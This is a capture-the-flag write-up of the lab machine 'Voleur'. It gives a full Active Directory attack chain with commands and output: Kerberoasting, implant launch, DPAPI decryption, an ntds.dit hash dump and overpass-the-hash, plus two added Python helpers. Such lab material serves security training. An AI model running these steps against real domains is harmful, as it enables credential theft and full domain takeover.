Voleur
quickie
User
Set up /etc/krb5.conf for Kerberos authentication against voleur.htb. NTLM is disabled on the DC (netexec reports NTLM:False further down), so every tool has to authenticate with Kerberos, which needs a realm configuration and hostnames that resolve:
[libdefaults]
default_realm = VOLEUR.HTB
dns_lookup_realm = false
dns_lookup_kdc = false
ticket_lifetime = 24h
forwardable = true
[realms]
VOLEUR.HTB = {
kdc = 10.10.11.76
}
[domain_realm]
.voleur.htb = VOLEUR.HTB
voleur.htb = VOLEUR.HTB
Set your /etc/hosts file appropriately. Service tickets are bound to the DC's hostname, so always connect by name rather than by IP:
10.10.11.76 DC.voleur.htb voleur.htb
We can now request a TGT with kinit and use it for Kerberos authentication:
kinit ryan.naylor
ryan.naylor@VOLEUR.HTB's Password:
klist
Credentials cache: FILE:/tmp/krb5cc_1000
Principal: ryan.naylor@VOLEUR.HTB
Issued Expires Principal
Jul 7 06:27:07 2025 Jul 7 16:27:07 2025 krbtgt/VOLEUR.HTB@VOLEUR.HTB
export KRB5CCNAME=/tmp/krb5cc_1000
With KRB5CCNAME pointed at the cache, netexec (-k), evil-winrm (-r) and the impacket tools (-k -no-pass) pick the ticket up instead of asking for a password.
Enumerating the SMB shares with the ticket turns up a password-protected spreadsheet, Access_Review.xlsx. Office 2013-format encryption derives its key from the password with 100,000 iterations, so it is crackable but slow; office2john extracts the hash for john:
office2john Access_Review.xlsx > hash.txt
john --wordlist=/home/kali/Desktop/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 256/256 AVX2 8x / SHA512 256/256 AVX2 4x AES])
Cost 1 (MS Office version) is 2013 for all loaded hashes
Cost 2 (iteration count) is 100000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
football1 (Access_Review.xlsx)
1g 0:00:00:01 DONE (2025-07-07 03:31) 0.7352g/s 611.7p/s 611.7c/s 611.7C/s football1..legolas
Use the "--show" option to display all of the cracked passwords reliably
The spreadsheet gives us the following credentials:
svc_ldap : M1XyC9pW7qT5Vn
svc_iis : N5pXyW1VqM7CZ8
todd.wolfe : NightT1meP1dg3on14
svc_ldap has WriteSPN over svc_winrm. Without ADCS in the domain there is no PKINIT to support a shadow-credentials style approach, so targeted Kerberoasting is the route: write an arbitrary SPN onto svc_winrm, request a service ticket for that SPN, and crack the ticket offline against svc_winrm's password. The SPN is a persistent change to the object, so remove it again once the ticket is captured (for example Set-ADUser svc_winrm -ServicePrincipalNames @{Remove='http/anything'} from a shell on the domain).
bloodyAD -d voleur.htb --host dc.voleur.htb -u svc_ldap -p M1XyC9pW7qT5Vn -k set object "svc_winrm" servicePrincipalName -v 'http/anything'
[+] svc_winrm's servicePrincipalName has been updated
netexec ldap DC.voleur.htb -u 'svc_ldap' -p 'M1XyC9pW7qT5Vn' -k --kerberoasting out.txt
LDAP DC.voleur.htb 389 DC [*] None (name:DC) (domain:voleur.htb)
LDAP DC.voleur.htb 389 DC [+] voleur.htb\svc_ldap:M1XyC9pW7qT5Vn
LDAP DC.voleur.htb 389 DC [*] Skipping disabled account: krbtgt
LDAP DC.voleur.htb 389 DC [*] Total of records returned 1
LDAP DC.voleur.htb 389 DC [*] sAMAccountName: svc_winrm, memberOf: CN=Remote Management Users,CN=Builtin,DC=voleur,DC=htb, pwdLastSet: 2025-01-31 17:10:12.398769, lastLogon: 2025-07-07 03:14:39.737268
LDAP DC.voleur.htb 389 DC $krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb\svc_winrm*$e3a804f76a893f34385ed7418ff6bb1b$<snip>
Cracking that TGS hash offline (hashcat mode 13100, or john's krb5tgs format) recovers svc_winrm's password:
$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb\svc_winrm*$<snip>:AFireInsidedeOzarctica980219afi
With svc_winrm's password we can get the user flag. svc_winrm is in Remote Management Users (see the memberOf in the netexec output above), so request a TGT with kinit and let evil-winrm use the ticket (-r sets the realm; with a ticket in the cache the username is only informational, as the warning below says):
kinit svc_winrm
svc_winrm@VOLEUR.HTB's Password:
evil-winrm -i DC.voleur.htb -u svc_winrm -r voleur.htb
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: User is not needed for Kerberos auth. Ticket will be used
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_winrm\Documents>
Root
svc_ldap is in the Restore Users group, which the spreadsheet note hints can restore the deleted user Todd.Wolfe. We get a shell as svc_ldap by launching a Sliver implant through RunasCs.exe from the svc_winrm session:
execute-assembly /home/kali/Desktop/HTB/Tools/precompiled-binaries/LateralMovement/RunasCs.exe svc_ldap M1XyC9pW7qT5Vn a.exe
[*] Beacon bec3c39d OLD-FASHIONED_SHADOWBOX - 10.10.11.76:64050 (DC) - windows/amd64 - Mon, 07 Jul 2025 05:27:49 +08
Deleted objects live in the Deleted Objects container and are listed with -IncludeDeletedObjects. A deleted object's RDN is mangled to name\0ADEL:<objectGUID> (\0A is a newline, which is why PowerShell prints the Name over two lines). Restore-ADObject puts the object back under its lastKnownParent unless -TargetPath is given; the restored account keeps its SID, group memberships and password hash (consistent with the AD Recycle Bin being enabled in this forest), which is why the password from the spreadsheet works again afterwards. The account is still disabled after the restore, so it has to be enabled as well:
PS C:\Windows\system32> Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects
Deleted : True
DistinguishedName : CN=Deleted Objects,DC=voleur,DC=htb
Name : Deleted Objects
ObjectClass : container
ObjectGUID : 587cd8b4-6f6a-46d9-8bd4-8fb31d2e18d8
Deleted : True
DistinguishedName : CN=Todd Wolfe\0ADEL:1c6b1deb-c372-4cbb-87b1-15031de169db,CN=Deleted Objects,DC=voleur,DC=htb
Name : Todd Wolfe
DEL:1c6b1deb-c372-4cbb-87b1-15031de169db
ObjectClass : user
ObjectGUID : 1c6b1deb-c372-4cbb-87b1-15031de169db
PS C:\Windows\system32> Restore-ADObject -Identity 1c6b1deb-c372-4cbb-87b1-15031de169db
PS C:\Windows\system32> Enable-ADAccount -Identity "Todd.Wolfe"
We can check with netexec whether Todd.Wolfe's account is usable again, using the password from the spreadsheet (NightT1meP1dg3on14):
netexec smb DC.voleur.htb -u 'Todd.Wolfe' -p NightT1meP1dg3on14 -k
SMB DC.voleur.htb 445 DC [*] x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB DC.voleur.htb 445 DC [+] voleur.htb\Todd.Wolfe:NightT1meP1dg3on14
netexec smb DC.voleur.htb -u 'Todd.Wolfe' -p NightT1meP1dg3on14 -k --shares
SMB DC.voleur.htb 445 DC [*] x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB DC.voleur.htb 445 DC [+] voleur.htb\Todd.Wolfe:NightT1meP1dg3on14
SMB DC.voleur.htb 445 DC [*] Enumerated shares
SMB DC.voleur.htb 445 DC Share Permissions Remark
SMB DC.voleur.htb 445 DC ----- ----------- ------
SMB DC.voleur.htb 445 DC ADMIN$ Remote Admin
SMB DC.voleur.htb 445 DC C$ Default share
SMB DC.voleur.htb 445 DC Finance
SMB DC.voleur.htb 445 DC HR
SMB DC.voleur.htb 445 DC IPC$ READ Remote IPC
SMB DC.voleur.htb 445 DC IT READ
SMB DC.voleur.htb 445 DC NETLOGON READ Logon server share
SMB DC.voleur.htb 445 DC SYSVOL READ Logon server share
Accessing the IT share again as Todd.Wolfe turns up an archived copy of his home directory. It contains DPAPI-protected data that we can decrypt offline with impacket-dpapi: a domain user's masterkey is protected by a key derived from that user's password and SID, and we have both. The two artefacts live in different places under the profile:
The masterkey is at C:\Users\todd.wolfe\AppData\Roaming\Microsoft\Protect\S-1-5-21-3927696377-1337352550-2781715495-1110\08949382-134f-4c63-b93c-ce52efc0aa88
The credential blob is at C:\Users\todd.wolfe\AppData\Roaming\Microsoft\Credentials\772275FAD58525253490A9B0039791D3
impacket-dpapi masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -password NightT1meP1dg3on14 -sid S-1-5-21-3927696377-1337352550-2781715495-1110
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[MASTERKEYFILE]
Version : 2 (2)
Guid : 08949382-134f-4c63-b93c-ce52efc0aa88
Flags : 0 (0)
Policy : 0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)
Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
impacket-dpapi credential -file 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[CREDENTIAL]
LastWritten : 2025-01-29 12:55:19
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target : Domain:target=Jezzas_Account
Description :
Unknown :
Username : jeremy.combs
Unknown : qT3V9pLXyN7W4m
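To know which masterkey a given credential blob needs, read it out of the blob itself: every DPAPI blob carries the GUID of the masterkey that protected it, and that GUID is the filename under ...\Microsoft\Protect\<SID>\. The following Python is an added example, not part of this writeup or of impacket: it parses the credential file wrapper (12-byte header, then a DPAPI blob) and the DPAPI blob header, following the field layout impacket uses for its CredentialFile and DPAPI_BLOB structures, with GUIDs stored in Windows little-endian form, and reports which masterkey file and SID folder to go looking for. The sample file is constructed in code with the masterkey GUID and SID from this box; the encrypted payload, salt and signature in it are filler bytes, not real ciphertext.

```python
import struct
import uuid

# Provider GUID present in every DPAPI blob, user or machine scope
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
# CryptoAPI ALG_ID values seen in DPAPI blobs
CALG = {0x6603: "CALG_3DES", 0x6610: "CALG_AES_256", 0x8004: "CALG_SHA1", 0x800E: "CALG_SHA_512"}


class Reader:
    """Tiny cursor over bytes for the DWORD-length-prefixed DPAPI layout."""

    def __init__(self, buf: bytes):
        self.buf, self.pos = buf, 0

    def u32(self) -> int:
        (v,) = struct.unpack_from("<I", self.buf, self.pos)
        self.pos += 4
        return v

    def take(self, n: int) -> bytes:
        chunk = self.buf[self.pos:self.pos + n]
        if len(chunk) != n:
            raise ValueError("truncated blob")
        self.pos += n
        return chunk

    def guid(self) -> uuid.UUID:
        return uuid.UUID(bytes_le=self.take(16))  # Windows stores GUIDs mixed-endian

    def lv(self) -> bytes:
        return self.take(self.u32())


def parse_dpapi_blob(blob: bytes) -> dict:
    """Walk the DPAPI_BLOB header; the masterkey GUID is what a decryption needs first."""
    r = Reader(blob)
    out = {"version": r.u32(), "provider": r.guid(), "masterkey_version": r.u32(),
           "masterkey_guid": r.guid(), "flags": r.u32()}
    out["description"] = r.lv().decode("utf-16-le").rstrip("\x00")
    out["crypt_algo"] = CALG.get(r.u32(), "unknown")
    out["crypt_algo_len"] = r.u32()          # key length in bits
    out["salt"] = r.lv()
    out["hmac_key"] = r.lv()                 # normally empty
    out["hash_algo"] = CALG.get(r.u32(), "unknown")
    out["hash_algo_len"] = r.u32()
    out["hmac"] = r.lv()
    out["data"] = r.lv()                     # the ciphertext
    out["sign"] = r.lv()                     # HMAC over the blob
    if out["provider"] != DPAPI_PROVIDER_GUID:
        raise ValueError("not a DPAPI blob (provider GUID mismatch)")
    return out


def parse_credential_file(data: bytes) -> dict:
    """Files under ...\\Microsoft\\Credentials\\ are Version, Size, Unknown (DWORDs) then a blob."""
    version, size, _unknown = struct.unpack_from("<III", data, 0)
    blob = parse_dpapi_blob(data[12:12 + size])
    blob["file_version"] = version
    return blob


def masterkey_path(sid: str, blob: dict) -> str:
    """Where the needed per-user masterkey lives in a roaming profile."""
    return "%APPDATA%\\Microsoft\\Protect\\" + sid + "\\" + str(blob["masterkey_guid"])


def build_sample_credential_file(masterkey_guid: str) -> bytes:
    """Constructed sample: header fields are meaningful, the payload is filler."""
    def lv(b: bytes) -> bytes:
        return struct.pack("<I", len(b)) + b
    desc = "Local Credential Data\x00".encode("utf-16-le")
    blob = (struct.pack("<I", 1) + DPAPI_PROVIDER_GUID.bytes_le
            + struct.pack("<I", 1) + uuid.UUID(masterkey_guid).bytes_le
            + struct.pack("<I", 0) + lv(desc)
            + struct.pack("<II", 0x6610, 256) + lv(b"\x01" * 32)   # AES-256, 32-byte salt
            + lv(b"")                                              # no HMAC key
            + struct.pack("<II", 0x800E, 512) + lv(b"\x02" * 64)   # SHA-512, 64-byte HMAC
            + lv(b"\x03" * 192) + lv(b"\x04" * 64))                # filler data and signature
    return struct.pack("<III", 1, len(blob), 0) + blob


if __name__ == "__main__":
    sample = build_sample_credential_file("08949382-134f-4c63-b93c-ce52efc0aa88")
    parsed = parse_credential_file(sample)
    print("masterkey GUID:", parsed["masterkey_guid"])
    print("cipher / hash :", parsed["crypt_algo"], parsed["hash_algo"])
    print("look in       :", masterkey_path("S-1-5-21-3927696377-1337352550-2781715495-1110", parsed))
```

Once the GUID is known, the corresponding file under Protect\<SID>\ is the one to feed to impacket-dpapi masterkey with the user's password and SID, exactly as done above; a blob whose masterkey GUID has no matching file in the profile cannot be decrypted from that profile copy alone.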
Enumerating the shares again, now as jeremy.combs, gives access to an SSH private key for svc_backup, as the spreadsheet note hinted. SSH on port 2222 is served by a WSL instance on the DC (the banner below shows Ubuntu on a Microsoft kernel).
ssh -i id_rsa -p 2222 svc_backup@DC.voleur.htb
Welcome to Ubuntu 20.04 LTS (GNU/Linux 4.4.0-20348-Microsoft x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun Jul 6 15:05:32 PDT 2025
System load: 0.52 Processes: 15
Usage of /home: unknown Users logged in: 0
Memory usage: 60% IPv4 address for eth0: 10.10.11.76
Swap usage: 3%
363 updates can be installed immediately.
257 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sun Jul 6 14:38:47 2025 from 10.10.11.76
* Starting OpenBSD Secure Shell server sshd [ OK ]
svc_backup@DC:~$ ls
svc_backup@DC:~$ whoami
svc_backup
From WSL the Windows filesystem is mounted under /mnt/c, so the folder behind the IT share can be read directly on disk. In Third-Line Support\Backups the registry directory holds copies of the SECURITY and SYSTEM hives and the 'Active Directory' directory holds an ntds.dit:
root@DC:/mnt/c/IT/Third-Line Support/Backups# ls
'Active Directory' registry
root@DC:/mnt/c/IT/Third-Line Support/Backups# cd registry
root@DC:/mnt/c/IT/Third-Line Support/Backups/registry# ls
SECURITY SYSTEM
Copy the three files back to the attack box and dump the domain offline with secretsdump in LOCAL mode (SYSTEM supplies the boot key that unwraps the PEK protecting ntds.dit; SECURITY yields the LSA secrets, including the machine account). The Administrator hash then gets us in over WinRM:
impacket-secretsdump local -system SYSTEM -security SECURITY -ntds ntds.dit
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0xbbdd1a32433b87bcc9b875321b883d2d
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:759d6c7b27b4c7c4feda8909bc656985b457ea8d7cee9e0be67971bcb648008804103df46ed40750e8d3be1a84b89be42a27e7c0e2d0f6437f8b3044e840735f37ba5359abae5fca8fe78959b667cd5a68f2a569b657ee43f9931e2fff61f9a6f2e239e384ec65e9e64e72c503bd86371ac800eb66d67f1bed955b3cf4fe7c46fca764fb98f5be358b62a9b02057f0eb5a17c1d67170dda9514d11f065accac76de1ccdb1dae5ead8aa58c639b69217c4287f3228a746b4e8fd56aea32e2e8172fbc19d2c8d8b16fc56b469d7b7b94db5cc967b9ea9d76cc7883ff2c854f76918562baacad873958a7964082c58287e2
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:d5db085d469e3181935d311b72634d77
[*] DPAPI_SYSTEM
dpapi_machinekey:0x5d117895b83add68c59c7c48bb6db5923519f436
dpapi_userkey:0xdce451c1fdc323ee07272945e3e0013d5a07d1c3
[*] NL$KM
0000 06 6A DC 3B AE F7 34 91 73 0F 6C E0 55 FE A3 FF .j.;..4.s.l.U...
0010 30 31 90 0A E7 C6 12 01 08 5A D0 1E A5 BB D2 37 01.......Z.....7
0020 61 C3 FA 0D AF C9 94 4A 01 75 53 04 46 66 0A AC a......J.uS.Ff..
0030 D8 99 1F D3 BE 53 0C CF 6E 2A 4E 74 F2 E9 F2 EB .....S..n*Nt....
NL$KM:066adc3baef73491730f6ce055fea3ff3031900ae7c61201085ad01ea5bbd23761c3fa0dafc9944a0175530446660aacd8991fd3be530ccf6e2a4e74f2e9f2eb
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 898238e1ccd2ac0016a18c53f4569f40
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:d5db085d469e3181935d311b72634d77:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5aeef2c641148f9173d663be744e323c:::
voleur.htb\ryan.naylor:1103:aad3b435b51404eeaad3b435b51404ee:3988a78c5a072b0a84065a809976ef16:::
voleur.htb\marie.bryant:1104:aad3b435b51404eeaad3b435b51404ee:53978ec648d3670b1b83dd0b5052d5f8:::
voleur.htb\lacey.miller:1105:aad3b435b51404eeaad3b435b51404ee:2ecfe5b9b7e1aa2df942dc108f749dd3:::
voleur.htb\svc_ldap:1106:aad3b435b51404eeaad3b435b51404ee:0493398c124f7af8c1184f9dd80c1307:::
voleur.htb\svc_backup:1107:aad3b435b51404eeaad3b435b51404ee:f44fe33f650443235b2798c72027c573:::
voleur.htb\svc_iis:1108:aad3b435b51404eeaad3b435b51404ee:246566da92d43a35bdea2b0c18c89410:::
voleur.htb\jeremy.combs:1109:aad3b435b51404eeaad3b435b51404ee:7b4c3ae2cbd5d74b7055b7f64c0b3b4c:::
voleur.htb\svc_winrm:1601:aad3b435b51404eeaad3b435b51404ee:5d7e377177574
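Before reaching for the Administrator hash it is worth triaging the dump rather than using a single line of it: the same NT hash on several accounts means password reuse (one cracked password opens all of them), the empty-string hash 31d6cfe0d16ae931b73c59d7e0c089c0 marks accounts with no password, and an LM field other than aad3b435b51404eeaad3b435b51404ee means LM hashes are still being stored. The following Python is an added example, not code from this writeup or from impacket; it parses secretsdump's domain\user:rid:lm:nt::: lines and runs those checks. The sample below is constructed for this page: it takes a few lines from the output above and adds two invented accounts, one reusing svc_ldap's NT hash and one with an LM hash present, so that every check has something to report.

```python
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of the empty string
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty string
LINE = re.compile(r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::")


def parse_dump(text: str):
    """Return (user, rid, lm, nt) tuples for every hash line; impacket's [*] status lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if m:
            entries.append((m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()))
    return entries


def triage(entries):
    """Flag empty passwords, stored LM hashes, NT-hash reuse and the two RIDs you never want leaked."""
    findings = {"empty_password": [], "lm_stored": [], "reused_nt": {}, "privileged_rids": []}
    by_nt = defaultdict(list)
    for user, rid, lm, nt in entries:
        if nt == EMPTY_NT:
            findings["empty_password"].append(user)
        if lm != EMPTY_LM:
            findings["lm_stored"].append(user)
        if rid in (500, 502):  # built-in Administrator and krbtgt
            findings["privileged_rids"].append(user)
        by_nt[nt].append(user)
    for nt, users in by_nt.items():
        if len(users) > 1 and nt != EMPTY_NT:
            findings["reused_nt"][nt] = users
    return findings


def report(findings) -> list:
    """Human-readable lines, one per finding, for dropping into notes."""
    lines = []
    lines += [f"empty password: {u}" for u in findings["empty_password"]]
    lines += [f"LM hash stored: {u}" for u in findings["lm_stored"]]
    lines += [f"NT hash {nt} shared by {', '.join(users)}" for nt, users in findings["reused_nt"].items()]
    lines += [f"privileged RID dumped: {u}" for u in findings["privileged_rids"]]
    return lines


# Constructed sample: page lines plus two invented accounts (constructed.user, legacy.user)
SAMPLE = """\
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5aeef2c641148f9173d663be744e323c:::
voleur.htb\\ryan.naylor:1103:aad3b435b51404eeaad3b435b51404ee:3988a78c5a072b0a84065a809976ef16:::
voleur.htb\\svc_ldap:1106:aad3b435b51404eeaad3b435b51404ee:0493398c124f7af8c1184f9dd80c1307:::
voleur.htb\\constructed.user:1998:aad3b435b51404eeaad3b435b51404ee:0493398c124f7af8c1184f9dd80c1307:::
voleur.htb\\legacy.user:1999:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
"""

if __name__ == "__main__":
    for line in report(triage(parse_dump(SAMPLE))):
        print(line)
```

A reused NT hash is also the cheapest lateral path: the hash is usable for overpass-the-hash on every account in the list without cracking anything, which is exactly what the getTGT step below does for Administrator.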
We do not have Administrator's password, and with NTLM disabled on the DC a plain pass-the-hash over SMB or WinRM is not possible. Instead use the NT hash to request a Kerberos TGT with impacket-getTGT (overpass-the-hash) and hand that ticket to evil-winrm through KRB5CCNAME:
impacket-getTGT voleur.htb/Administrator -hashes :e656e07c56d831611b577b160b259ad2
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in Administrator.ccache
export KRB5CCNAME=./Administrator.ccache
evil-winrm -i dc.voleur.htb -u Administrator -r voleur.htb
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: User is not needed for Kerberos auth. Ticket will be used
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>